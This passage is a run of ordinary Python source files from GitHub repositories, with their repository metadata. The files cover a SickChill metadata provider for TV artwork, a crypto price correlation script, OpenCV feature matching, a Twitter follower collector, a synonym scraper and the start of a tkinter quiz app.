self.save_poster(show_obj)\n return False\n\n def create_banner(self, show_obj):\n if self.banner and show_obj and not self._has_banner(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating banner for \" + show_obj.name)\n return self.save_banner(show_obj)\n return False\n\n def create_episode_thumb(self, ep_obj):\n if self.episode_thumbnails and ep_obj and not self._has_episode_thumb(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating episode thumbnail for \" + ep_obj.pretty_name)\n return self.save_thumbnail(ep_obj)\n return False\n\n def create_season_posters(self, show_obj):\n if self.season_posters and show_obj:\n result = []\n for season in show_obj.episodes:\n if not self._has_season_poster(show_obj, season):\n logger.debug(\"Metadata provider \" + self.name + \" creating season posters for \" + show_obj.name)\n result.extend([self.save_season_poster(show_obj, season)])\n return all(result)\n return False\n\n def create_season_banners(self, show_obj):\n if self.season_banners and show_obj:\n result = []\n logger.debug(\"Metadata provider \" + self.name + \" creating season banners for \" + show_obj.name)\n for season 
in show_obj.episodes:\n                if not self._has_season_banner(show_obj, season):\n                    result.extend([self.save_season_banner(show_obj, season)])\n            return all(result)\n        return False\n\n    def create_season_all_poster(self, show_obj):\n        if self.season_all_poster and show_obj and not self._has_season_all_poster(show_obj):\n            logger.debug(\"Metadata provider \" + self.name + \" creating season all poster for \" + show_obj.name)\n            return self.save_season_all_poster(show_obj)\n        return False\n\n    def create_season_all_banner(self, show_obj):\n        if self.season_all_banner and show_obj and not self._has_season_all_banner(show_obj):\n            logger.debug(\"Metadata provider \" + self.name + \" creating season all banner for \" + show_obj.name)\n            return self.save_season_all_banner(show_obj)\n        return False\n\n    def write_show_file(self, show_obj):\n        \"\"\"\n        Generates and writes show_obj's metadata under the given path to the\n        filename given by get_show_file_path()\n\n        show_obj: TVShow object for which to create the metadata\n\n        path: An absolute or relative path where we should put the file. Note that\n                the file name will be the default show_filename.\n\n        Note that this method expects that _show_data will return an ElementTree\n        object. If your _show_data returns data in another format you'll need to\n        override this method.\n        \"\"\"\n\n        data = self._show_data(show_obj)\n\n        if not data:\n            return False\n\n        nfo_file_path = self.get_show_file_path(show_obj)\n        nfo_file_dir = os.path.dirname(nfo_file_path)\n\n        try:\n            if not os.path.isdir(nfo_file_dir):\n                logger.debug(\"Metadata dir didn't exist, creating it at \" + nfo_file_dir)\n                os.makedirs(nfo_file_dir)\n                helpers.chmodAsParent(nfo_file_dir)\n\n            logger.debug(\"Writing show nfo file to \" + nfo_file_path)\n\n            nfo_file = open(nfo_file_path, \"wb\")\n            data.write(nfo_file, encoding=\"UTF-8\", xml_declaration=True)\n            nfo_file.close()\n            helpers.chmodAsParent(nfo_file_path)\n        except IOError as error:\n            logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n            return False\n\n        return True\n\n    def write_ep_file(self, ep_obj):\n        \"\"\"\n        Generates and writes ep_obj's metadata under the given path with the\n        given filename root. Uses the episode's name with the extension in\n        _ep_nfo_extension.\n\n        ep_obj: TVEpisode object for which to create the metadata\n\n        filename_path: The file name to use for this metadata. Note that the extension\n                       will be automatically added based on _ep_nfo_extension. This should\n                       include an absolute path.\n\n        Note that this method expects that _ep_data will return an ElementTree\n        object. If your _ep_data returns data in another format you'll need to\n        override this method.\n        \"\"\"\n\n        data = self._ep_data(ep_obj)\n        if not data:\n            return False\n\n        # def print_data(d):\n        #     for child in d.getroot():\n        #         print(str(child.tag), str(child.text))\n\n        # print_data(data)\n\n        nfo_file_path = self.get_episode_file_path(ep_obj)\n        nfo_file_dir = os.path.dirname(nfo_file_path)\n\n        try:\n            if not os.path.isdir(nfo_file_dir):\n                logger.debug(\"Metadata dir didn't exist, creating it at \" + nfo_file_dir)\n                os.makedirs(nfo_file_dir)\n                helpers.chmodAsParent(nfo_file_dir)\n\n            logger.debug(\"Writing episode nfo file to \" + nfo_file_path)\n            nfo_file = open(nfo_file_path, \"wb\")\n            data.write(nfo_file, encoding=\"UTF-8\", xml_declaration=True)\n            nfo_file.close()\n            helpers.chmodAsParent(nfo_file_path)\n        except IOError as error:\n            logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? 
{error}\")\n return False\n\n return True\n\n def save_thumbnail(self, ep_obj):\n \"\"\"\n Retrieves a thumbnail and saves it to the correct spot. This method should not need to\n be overridden by implementing classes, changing get_episode_thumb_path and\n _get_episode_thumb_url should suffice.\n\n ep_obj: a TVEpisode object for which to generate a thumbnail\n \"\"\"\n\n thumb_url = sickchill.indexer.episode_image_url(ep_obj)\n if not thumb_url:\n logger.debug(\"No thumb is available for this episode, not creating a thumb\")\n return False\n\n file_path = self.get_episode_thumb_path(ep_obj)\n if not file_path:\n logger.debug(\"Unable to find a file path to use for this thumbnail, not generating it\")\n return False\n\n thumb_data = metadata_helpers.getShowImage(thumb_url)\n if not thumb_data:\n logger.debug(\"No thumb is available for this episode, not creating a thumb\")\n return False\n\n result = self._write_image(thumb_data, file_path)\n\n if not result:\n return False\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n cur_ep.hastbn = True\n\n return True\n\n def save_fanart(self, show_obj):\n \"\"\"\n Downloads a fanart image and saves it to the filename specified by fanart_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download fanart\n \"\"\"\n\n # use the default fanart name\n fanart_path = self.get_fanart_path(show_obj)\n if not fanart_path:\n logger.debug(\"Fanart path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n fanart_url = sickchill.indexer.series_fanart_url(show_obj)\n if not fanart_url:\n fanart_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"fanart\")\n if not fanart_url:\n logger.debug(\"Fanart url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n fanart_data = metadata_helpers.getShowImage(fanart_url)\n if not fanart_data:\n logger.debug(\"No fanart image was retrieved, unable to write fanart\")\n return False\n\n return self._write_image(fanart_data, fanart_path)\n\n def save_poster(self, show_obj):\n \"\"\"\n Downloads a poster image and saves it to the filename specified by poster_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download a poster\n \"\"\"\n\n # use the default poster name\n poster_path = self.get_poster_path(show_obj)\n if not poster_path:\n logger.debug(\"Banner path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n poster_url = sickchill.indexer.series_poster_url(show_obj)\n if not poster_url:\n poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"poster\")\n if not poster_url:\n logger.debug(\"Poster url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n poster_data = metadata_helpers.getShowImage(poster_url)\n if not poster_data:\n logger.debug(\"No show poster image was retrieved, unable to write poster\")\n return False\n\n return self._write_image(poster_data, poster_path)\n\n def save_banner(self, show_obj):\n \"\"\"\n Downloads a banner image and saves it to the filename specified by banner_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download a banner\n \"\"\"\n\n banner_path = self.get_banner_path(show_obj)\n if not banner_path:\n logger.debug(\"Banner path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n banner_url = sickchill.indexer.series_banner_url(show_obj)\n if not banner_url:\n banner_url = 
self._retrieve_show_image_urls_from_fanart(show_obj, \"banner\")\n if not banner_url:\n logger.debug(\"Banner url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n banner_data = metadata_helpers.getShowImage(banner_url)\n if not banner_data:\n logger.debug(\"No show banner image was retrieved, unable to write banner\")\n return False\n\n return self._write_image(banner_data, banner_path)\n\n def save_season_poster(self, show_obj, season):\n \"\"\"\n Saves a specific season poster to disk for the given show.\n\n show_obj: a TVShow object for which to save the season thumbs\n \"\"\"\n\n season_poster_url = sickchill.indexer.season_poster_url(show_obj, season)\n if not season_poster_url:\n season_poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_poster\", season=season)\n if not season_poster_url:\n logger.debug(\"Season poster url not found for season {}, skipping this season\".format(season))\n return False\n\n season_poster_file_path = self.get_season_poster_path(show_obj, season)\n if not season_poster_file_path:\n logger.debug(\"Path for season {} came back blank, skipping this season\".format(season))\n return False\n\n image_data = metadata_helpers.getShowImage(season_poster_url)\n if not image_data:\n logger.debug(\"No season poster data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_poster_file_path)\n\n def save_season_banner(self, show_obj, season):\n \"\"\"\n Saves the first season banner for a season to disk for the given show.\n\n show_obj: a TVShow object for which to save the season thumbs\n \"\"\"\n season_banner_url = sickchill.indexer.season_banner_url(show_obj, season)\n if not season_banner_url:\n season_banner_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_banner\", season=season)\n if not season_banner_url:\n logger.debug(\"Url for season banner {} came back blank, skipping this season\".format(season))\n return False\n\n season_banner_file_path = self.get_season_banner_path(show_obj, season)\n if not season_banner_file_path:\n logger.debug(\"Path for season {} came back blank, skipping this season\".format(season))\n return False\n\n image_data = metadata_helpers.getShowImage(season_banner_url)\n if not image_data:\n logger.debug(\"No season banner data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_banner_file_path)\n\n def save_season_all_poster(self, show_obj):\n poster_url = sickchill.indexer.series_poster_url(show_obj)\n if not poster_url:\n poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_poster\", season=0)\n if not poster_url:\n logger.debug(\"Url for season all poster came back blank, skipping this season\")\n return False\n\n season_poster_file_path = self.get_season_all_poster_path(show_obj)\n if not season_poster_file_path:\n logger.debug(\"Path for season all poster came back blank, skipping this season\")\n return False\n\n image_data = metadata_helpers.getShowImage(poster_url)\n if not image_data:\n logger.debug(\"No season all poster data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_poster_file_path)\n\n def save_season_all_banner(self, show_obj):\n banner_url = sickchill.indexer.series_banner_url(show_obj)\n if not banner_url:\n banner_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_banner\", season=0)\n if not banner_url:\n logger.debug(\"Url for season all banner came 
back blank, skipping this season\")\n return False\n\n season_banner_file_path = self.get_season_all_banner_path(show_obj)\n if not season_banner_file_path:\n logger.debug(\"Path for season all banner came back blank, skipping this season\")\n return False\n\n image_data = metadata_helpers.getShowImage(banner_url)\n if not image_data:\n logger.debug(\"No season all banner data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_banner_file_path)\n\n @staticmethod\n def _write_image(image_data, image_path, overwrite=False):\n \"\"\"\n Saves the data in image_data to the location image_path. Returns True/False\n to represent success or failure.\n\n image_data: binary image data to write to file\n image_path: file location to save the image to\n \"\"\"\n\n # don't bother overwriting it\n if not overwrite and os.path.isfile(image_path):\n logger.debug(\"Image already exists, not downloading\")\n return False\n\n image_dir = os.path.dirname(image_path)\n\n if not image_data:\n logger.debug(\"Unable to retrieve image to save in {0}, skipping\".format(image_path))\n return False\n\n try:\n if not os.path.isdir(image_dir):\n logger.debug(\"Metadata dir didn't exist, creating it at \" + image_dir)\n os.makedirs(image_dir)\n helpers.chmodAsParent(image_dir)\n\n outFile = open(image_path, \"wb\")\n outFile.write(image_data)\n outFile.close()\n helpers.chmodAsParent(image_path)\n except IOError as error:\n logger.error(f\"Unable to write file to {image_path} - are you sure the folder is writable? {error}\")\n return False\n\n return True\n\n def retrieveShowMetadata(self, folder):\n \"\"\"\n Used only when mass adding Existing Shows, using previously generated Show metadata to reduce the need to query TVDB.\n \"\"\"\n\n empty_return = (None, None, None)\n\n metadata_path = os.path.join(folder, self._show_metadata_filename)\n\n if not os.path.isdir(folder) or not os.path.isfile(metadata_path):\n logger.debug(_(\"Can't load the metadata file from {0}, it doesn't exist\").format(metadata_path))\n return empty_return\n\n logger.debug(_(\"Loading show info from metadata file in {0}\").format(metadata_path))\n\n def read_xml():\n with open(metadata_path, \"rb\") as __xml_file:\n try:\n __show_xml = ElementTree.ElementTree(file=__xml_file)\n except (ElementTree.ParseError, IOError):\n __show_xml = None\n return __show_xml\n\n def fix_xml():\n logger.info(\n _(\n \"There was an error loading {0}, trying to repair it by fixing & symbols. 
If it still has problems, please check the file \" \"manually\"\n                ).format(metadata_path)\n            )\n            with open(metadata_path) as __xml_file:\n                output = __xml_file.read()\n\n            regex = re.compile(r\"&(?!amp;|lt;|gt;)\")\n            output = regex.sub(\"&amp;\", output)\n            with open(metadata_path, \"w\") as __xml_file:\n                __xml_file.write(output)\n\n            return True\n\n        try:\n            show_xml = read_xml() or fix_xml() and read_xml()\n            if not show_xml:\n                logger.debug(_(\"Can't load the metadata file from {0}, error reading file\").format(metadata_path))\n                return empty_return\n\n            if not (show_xml.findtext(\"title\") or (show_xml.findtext(\"tvdbid\") and show_xml.findtext(\"id\"))):\n                logger.info(\n                    _(\"Invalid info in tvshow.nfo (missing name or id): {0} {1} {2}\").format(\n                        show_xml.findtext(\"title\"), show_xml.findtext(\"tvdbid\"), show_xml.findtext(\"id\")\n                    )\n                )\n                return empty_return\n\n            name = show_xml.findtext(\"title\")\n\n            indexer_id_text = show_xml.findtext(\"tvdbid\") or show_xml.findtext(\"id\")\n            if indexer_id_text:\n                indexer_id = try_int(indexer_id_text, None)\n                if indexer_id is None or indexer_id < 1:\n                    logger.debug(_(\"Invalid Indexer ID ({0}), not using metadata file\").format(str(indexer_id)))\n                    return empty_return\n            else:\n                logger.debug(_(\"Empty <id> or <tvdbid> field in NFO, unable to find an ID, not using metadata file\"))\n                return empty_return\n\n            indexer = 1\n            epg_url_text = show_xml.findtext(\"episodeguide/url\")\n            if epg_url_text:\n                epg_url = epg_url_text.lower()\n                if str(indexer_id) in epg_url and \"tvrage\" in epg_url:\n                    if sickchill.indexer.TVRAGE not in sickchill.indexer:\n                        logger.warning(_(\"Invalid Indexer ID ({0}), not using metadata file because it has TVRage info\").format(indexer_id))\n                        return empty_return\n                    return indexer_id, show_xml.findtext(\"title\"), sickchill.indexer.TVRAGE\n                if str(indexer_id) in epg_url and \"tvdb\" in epg_url:\n                    return indexer_id, show_xml.findtext(\"title\"), sickchill.indexer.TVDB\n\n        except Exception as error:\n            logger.warning(_(\"There was an error parsing your existing metadata file: '{path}' error: {error}\").format(path=metadata_path, error=error))\n            return empty_return\n\n        return indexer_id, name, indexer\n\n    @staticmethod\n    def _retrieve_show_image_urls_from_tmdb(show, img_type, multiple=False):\n        types = {\"poster\": \"posters\", \"banner\": None, \"fanart\": \"backdrops\", \"poster_thumb\": \"posters\", \"banner_thumb\": None}\n\n        if not types[img_type]:\n            return [] if multiple else \"\"\n\n        # get TMDB configuration info\n        tmdbsimple.API_KEY = settings.TMDB_API_KEY\n        config = tmdbsimple.Configuration()\n        response = config.info()\n        base_url = response[\"images\"][\"base_url\"]\n        sizes = response[\"images\"][\"poster_sizes\"]\n\n        def size_str_to_int(x):\n            return float(\"inf\") if x == \"original\" else int(x[1:])\n\n        max_size = max(sizes, key=size_str_to_int)\n\n        try:\n            results = []\n            find = tmdbsimple.Find(show.indexerid)\n            found = find.info(external_source=\"tvdb_id\")\n            if found[\"tv_results\"]:\n                tmdb_show = tmdbsimple.TV(found[\"tv_results\"][0][\"id\"])\n                images = tmdb_show.images()\n                if types[img_type] in images:\n                    for result in images[types[img_type]]:\n                        results.append(\"{0}{1}{2}\".format(base_url, max_size, result[\"file_path\"]))\n                    if not multiple:\n                        return results[0]\n                    return results\n        except Exception as error:\n            logger.debug(error)\n\n        logger.info(\"Could not find any \" + img_type + \" images on TMDB for \" + show.name)\n\n    @staticmethod\n    def _retrieve_show_image_urls_from_fanart(show, img_type, thumb=False, season=None, multiple=False):\n        types = {\n
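            # The *_thumb entries intentionally reuse the full-size fanart.tv types;\n            # the /fanart/ -> /preview/ URL rewrite further down in this method is what\n            # turns a full-size result into its thumbnail variant.\n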
\"poster\": fanart.TYPE.TV.POSTER,\n \"banner\": fanart.TYPE.TV.BANNER,\n \"poster_thumb\": fanart.TYPE.TV.POSTER,\n \"banner_thumb\": fanart.TYPE.TV.BANNER,\n \"fanart\": fanart.TYPE.TV.BACKGROUND,\n \"season_poster\": fanart.TYPE.TV.SEASONPOSTER,\n \"season_banner\": fanart.TYPE.TV.SEASONBANNER,\n }\n\n try:\n if img_type in types:\n request = fanartRequest(\n apikey=settings.FANART_API_KEY,\n id=show.indexerid,\n ws=fanart.WS.TV,\n type=types[img_type],\n sort=fanart.SORT.POPULAR,\n limit=(fanart.LIMIT.ONE, fanart.LIMIT.ALL)[season is not None],\n )\n\n resp = request.response()\n results = resp[types[img_type]]\n if season:\n results = [x for x in results if try_int(x[\"season\"], default_value=None) == season]\n\n def _to_preview_url(url):\n return re.sub(\"/fanart/\", \"/preview/\", url)\n\n if multiple:\n urls = [result[\"url\"] for result in results]\n if thumb:\n urls = [_to_preview_url(url) for url in urls]\n return urls\n else:\n url = results[0][\"url\"]\n if thumb:\n url = _to_preview_url(url)\n return url\n except Exception as error:\n logger.debug(error)\n\n logger.info(\"Could not find any \" + img_type + \" images on Fanart.tv for \" + show.name)\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/providers/metadata/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":34875,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"16175686422","text":"import numpy\nfrom sklearn.linear_model import LinearRegression\n\ndef find_corr_coeff():#ищем коэффициент корреляции между ethusdt и btcusdt\n with open(\"data_ETHUSDT.txt\", \"r\") as prices_files:\n lst_eth = list(map(float,prices_files.read().split(\", \")[:-1]))\n\n with open(\"data_BTCUSDT.txt\", \"r\") as prices_files:\n lst_btc = list(map(float,prices_files.read().split(\", \")[:-1]))\n\n coef_corr = numpy.corrcoef(numpy.array(lst_eth),numpy.array(lst_btc))[0,1]\n print(coef_corr)\n\nfind_corr_coeff()","repo_name":"C0deMaestro/Find_changes_futeres","sub_path":"find_change_price.py","file_name":"find_change_price.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27834603658","text":"import cv2\nimport time\nimport numpy as np\n\nclass FeatureExtractor:\n def __init__(self):\n # initalize all types of feature extractors here\n # self.extractor = cv2.ORB()\n self.extractor = cv2.SIFT()\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks=50)\n self.matcher = cv2.FlannBasedMatcher(index_params,search_params)\n \n def find_keypoints(self, images):\n # convert the image to grayscale first\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n keypoints, destination = self.extractor.detectAndCompute(image, None)\n return (keypoints, destination)\n \n def match_points_and_find_E(self, des1, des2, focal, camera_coords):\n \"\"\"\n routine to find essential matrix\n \"\"\"\n matches = self.matcher.knnMatch(des1,des2,k=2)\n good = []\n pts1 = []\n pts2 = [] \n for i,(m,n) in enumerate(matches):\n if (m.distance < 0.8*n.distance):\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n pts1 = np.int32(pts1)\n pts2 = np.int32(pts2)\n E, mask = cv2.findEssentialMat(pts2, pts1, focal, camera_coords, RANSAC, 0.999, 1.0)\n\n # select the inlier points\n pts1 = pts1[mask.ravel()==1]\n pts2 = pts2[mask.ravel()==1]\n points, R, t, mask = cv2.recoverPose(E, pts1, pts2)\n return 
(R,t)","repo_name":"harshmunshi/MonoVO-Python","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36226201386","text":"import logging\r\n\r\nfrom persistence import local_io, database\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass Launcher:\r\n \"\"\"Template for launching collections of modules\"\"\"\r\n\r\n def __init__(self, **modules):\r\n \"\"\"\"\"\"\r\n self.persistence = local_io.PersistentDict(\"persistence/prst.json\")\r\n self.db_utils = database.DatabaseUtils\r\n self.modules = modules\r\n\r\n logger.info(self.__class__.__name__ + \" initialized\")\r\n\r\n if len(self.persistence) == 0:\r\n self.init_persistence()\r\n self.persistence[\"global\"][\"reboots\"] += 1\r\n \r\n self.launch_modules()\r\n\r\n \r\n \r\n def launch_modules(self):\r\n for module in self.modules.values():\r\n logger.info(\"Starting module {}\".format(module.__class__.__name__))\r\n module.modules = self.modules\r\n module.persistence = self.persistence\r\n module.db_utils = self.db_utils()\r\n module.start()\r\n\r\n\r\n def init_persistence(self):\r\n logger.warning(\"No persistence found, created a new one\")\r\n\r\n self.persistence[\"global\"] ={\r\n \"lists\" : {},\r\n \"reboots\": 0\r\n }\r\n\r\n for m_name in self.modules.keys():\r\n data = {}\r\n if m_name == \"bot\":\r\n data = {\r\n \"send_activity\" : {\"hour\":[], \"count\":[]},\r\n \"receive_activity\" : {\"hour\":[], \"count\":[]},\r\n \"execute_activity\" : {\"hour\":[], \"count\":[]},\r\n \"log\": [],\r\n \"chat_members\": {},\r\n \"aliases\" : {}\r\n }\r\n if m_name == \"clock\":\r\n data = {\r\n \"sensors\" : {\r\n \"time\" : [],\r\n \"temperature\":[],\r\n \"humidity\":[],\r\n \"brightness\" : [],\r\n }\r\n }\r\n \r\n self.persistence[m_name] = data\r\n\r\n ","repo_name":"moll-re/AIO","sub_path":"app/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8329940961","text":"# =============================================================================\n# Minet Twitter CLI Utils\n# =============================================================================\n#\n# Miscellaneous generic functions used throughout the twitter actions.\n#\nimport casanova\nimport sys\nfrom ebbe import with_is_last\nfrom tqdm import tqdm\nfrom twitwi import TwitterWrapper\nfrom twitter import TwitterHTTPError\n\n\ndef make_twitter_action(method_name, csv_headers):\n\n def action(namespace, output_file):\n\n # TODO: this is temp debug\n def listener(event, data):\n tqdm.write(event, file=sys.stderr)\n tqdm.write(repr(data), file=sys.stderr)\n\n wrapper = TwitterWrapper(\n namespace.access_token,\n namespace.access_token_secret,\n namespace.api_key,\n namespace.api_secret_key,\n listener=listener\n )\n\n enricher = casanova.enricher(\n namespace.file,\n output_file,\n keep=namespace.select,\n add=csv_headers + ['cursor'],\n resumable=namespace.resume,\n auto_resume=False\n )\n\n loading_bar = tqdm(\n desc='Retrieving ids',\n dynamic_ncols=True,\n total=namespace.total,\n unit=' followers',\n postfix={\n 'users': 0\n }\n )\n\n users_done = 0\n users_not_found = 0\n skipped = 0\n\n def update_stats():\n kwargs = {\n 'users': users_done\n }\n\n if users_not_found:\n kwargs['not_found'] = users_not_found\n\n if skipped:\n kwargs['skipped'] = skipped\n\n 
loading_bar.set_postfix(**kwargs)\n\n last_batch = None\n\n if namespace.resume:\n # TODO: sacralize this in specialized casanova enricher\n last_batch = casanova.reverse_reader.last_batch(\n output_file.name,\n batch_value=namespace.column,\n batch_cursor='cursor',\n end_symbol='end'\n )\n\n for row, user in enricher.cells(namespace.column, with_rows=True):\n if last_batch:\n if user != last_batch.value:\n skipped += 1\n update_stats()\n continue\n\n if user == last_batch.value and last_batch.finished:\n last_batch = None\n skipped += 1\n update_stats()\n continue\n\n all_ids = []\n next_cursor = -1\n result = None\n\n if last_batch and last_batch.cursor:\n next_cursor = last_batch.cursor\n\n if namespace.ids:\n wrapper_kwargs = {'user_id': user}\n else:\n wrapper_kwargs = {'screen_name': user}\n\n while next_cursor != 0:\n wrapper_kwargs['cursor'] = next_cursor\n\n skip_in_output = None\n\n if last_batch:\n skip_in_output = set(row[-2] for row in last_batch.rows)\n last_batch = None\n\n try:\n result = wrapper.call([method_name, 'ids'], **wrapper_kwargs)\n except TwitterHTTPError as e:\n\n # The user does not exist\n users_not_found += 1\n update_stats()\n break\n\n if result is not None:\n all_ids = result.get('ids', [])\n next_cursor = result.get('next_cursor', 0)\n\n loading_bar.update(len(all_ids))\n\n for is_last, user_id in with_is_last(all_ids):\n if skip_in_output and user_id in skip_in_output:\n continue\n\n if is_last:\n addendum = [user_id, next_cursor or 'end']\n else:\n addendum = [user_id, '']\n\n enricher.writerow(row, addendum)\n else:\n next_cursor = 0\n\n users_done += 1\n update_stats()\n\n loading_bar.close()\n\n return action\n","repo_name":"lebelgique/minet","sub_path":"minet/cli/twitter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"2503129210","text":"import os\nimport pickle\nfrom time import time_ns\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass SynonymsManager:\n __key = object()\n __instance = None\n\n def save(self):\n with open('synonyms_manager.pickle', 'wb') as file:\n pickle.dump(self, file)\n\n @staticmethod\n def load():\n if not os.path.exists('synonyms_manager.pickle'):\n return None\n with open('synonyms_manager.pickle', 'rb') as file:\n return pickle.load(file)\n\n @staticmethod\n def get_instance():\n if SynonymsManager.__instance is None:\n SynonymsManager.__instance = SynonymsManager.load()\n if SynonymsManager.__instance is None:\n SynonymsManager.__instance = SynonymsManager(SynonymsManager.__key)\n return SynonymsManager.__instance\n\n def __init__(self, key):\n if SynonymsManager.__key is not key:\n raise Exception('Singleton not respected')\n self.cache = {}\n\n def synonyms(self, term: str):\n if term.lower() in self.cache.keys():\n return self.cache[term.lower()]\n print(f'*** cerco sinonimo [{term}] ***')\n response = requests.get('https://www.thesaurus.com/browse/{}'.format(term))\n soup = BeautifulSoup(response.text, 'lxml')\n soup.find('section', {'class': 'css-17ofzyv e1ccqdb60'})\n syns = [span.text for span in\n soup.findAll('a',\n {'class': 'css-1kg1yv8 eh475bn0'})] # 'css-1gyuw4i eh475bn0' for less relevant synonyms\n self.cache[term.lower()] = syns\n self.save()\n return 
syns\n","repo_name":"MrPio/TheSeagullStory","sub_path":"managers/synonyms_manager.py","file_name":"synonyms_manager.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21000217498","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nfrom tkinter import filedialog\nimport shutil,os\nfrom dbaccess import Dbhelper\nimport random\n\nclass Quiz:\n # TO INIATE THE GUI\n\n def __init__(self):\n self._db = Dbhelper()\n self._root = Tk()\n self._root.title(\"QUIZ TESTER\")\n self._root.geometry(\"600x800\")\n self._root.config(background= \"#00C1FF\")\n self._root.resizable(0,0)\n\n self._welcome= Label(self._root,text=\"WELCOME TO QUIZ TESTER\",fg=\"#FF0000\",bg=\"#00C1FF\")\n self._welcome.config(font=(\"Algerian\",30,'bold'))\n self._welcome.pack(pady=(20,20))\n\n imageurl = \"images\\qlogo.png\"\n load = Image.open(imageurl)\n load = load.resize((150, 150), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render, )\n img.image = render\n img.pack(pady=(10,20))\n\n self._name = Label(self._root,text= \"ENTER YOUR NAME\",fg= \"#000\",bg=\"#00C1FF\")\n self._name.config(font=(\"Times\",16))\n self._name.pack(pady=(10,15))\n\n self._nameInput = Entry(self._root)\n self._nameInput.pack(pady=(10,15),ipadx = 70,ipady= 10)\n\n self._email = Label(self._root,text=\"ENTER YOUR EMAIL\",fg= \"#000\",bg=\"#00C1FF\")\n self._email.config(font=(\"Times\",16))\n self._email.pack(pady=(10,15))\n\n self._emailInput = Entry(self._root)\n self._emailInput.pack(pady=(10,15),ipadx=70,ipady=10)\n\n self._enter = Button(self._root,text=\"ENTER\",fg = \"#FFF300\",bg = \"#FF0000\",width= 15,height= 2,command= lambda : self.enter_user())\n self._enter.config(font=(\"Arial\",18))\n self._enter.pack(pady=(10,15))\n\n self._root.mainloop()\n\n\n def clear(self):\n for i in self._root.pack_slaves():\n i.destroy()\n\n# TO REGISTER A NEW USER INTO DATABASE. THE OLD USER DATA WILL NOT BE REGISTERED AGAIN BUT CAN PLAY\n def enter_user(self):\n self._name = self._nameInput.get()\n self._email = self._emailInput.get()\n self.generate()\n self._user_answers = []\n\n if len(self._name)>0 and len(self._email)>0:\n flag = self._db.enter_user(self._name,self._email)\n\n if flag == 1:\n self.clear()\n self.same_user()\n else:\n messagebox.showerror(\"ERROR\",\"SORRY SOMETHING WENT WRONG. PLEASE TRY AGAIN\")\n else:\n messagebox.showerror(\"ERROR\",\"PLEASE GIVE YOUR CORRECT CREDENTIALS\")\n\n# TO LOAD THE INTRODUCTION AND INSTRUCTION PAGE\n def load_quiz_window(self):\n self._readylabel = Label(self._root,text = \"READY TO START ?\",fg= \"#FF0000\",bg=\"#00C1FF\")\n self._readylabel.config(font=(\"Algerian\",30,'bold'))\n self._readylabel.pack(pady=(30,20))\n\n self._introlabel = Label(self._root,fg =\"#FF5100\",bg=\"#00C1FF\")\n self._introlabel.config(text = \"HI \" + str(self._name) + \" ARE YOU READY FOR THE QUIZ TEST ?\",wraplength = 400)\n self._introlabel.config(font=(\"Algerian\",18,'bold'),justify = \"center\")\n self._introlabel.pack(pady=(10,10))\n\n self._readylabel = Label(self._root, text=\"YOUR LAST TIME SCORE WAS \" + str(self.prev_score) + \" WANT TO DO BETTER THIS TIME ? 
